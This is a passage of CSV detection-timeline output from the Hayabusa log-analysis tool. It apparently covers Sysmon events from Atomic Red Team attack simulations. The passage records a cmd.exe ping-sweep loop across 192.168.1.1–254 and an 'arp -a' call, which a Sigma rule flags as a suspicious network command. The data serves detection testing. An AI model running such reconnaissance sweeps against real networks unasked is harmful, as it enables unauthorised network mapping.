+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.203 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:16.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.204 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:17.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.205 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:17.438 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.206 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:18.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.207 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:18.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.208 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:19.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.209 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:19.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.210 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:20.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.211 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:20.571 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.212 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:21.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.213 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:21.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.214 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:22.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.215 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:22.520 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.216 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:23.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.217 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:23.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.218 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:23.993 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.219 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:24.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.220 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:25.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.221 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:25.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.222 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:26.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.223 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:26.430 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.224 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:27.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.225 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:27.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.226 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:28.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.227 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:28.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.228 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:29.009 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.229 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:29.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.230 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:30.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.231 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:30.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.232 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:31.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.233 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:31.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.234 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.235 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:32.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.236 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:33.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.237 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:33.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.238 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:34.005 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.239 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:34.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.240 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:35.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.241 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:35.559 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.242 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:36.025 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.243 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:36.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.244 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:37.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.245 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:37.505 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.246 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:38.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.247 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:38.588 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.248 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:39.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.249 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:39.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.250 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:40.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.251 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:40.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.252 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:40.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.253 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:41.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.254 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.061 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,low,Suspicious Network Command,,rules/sigma/process_creation/win_pc_susp_network_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.301 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: arp -a : Path: C:\Windows\System32\ARP.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:42.404 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 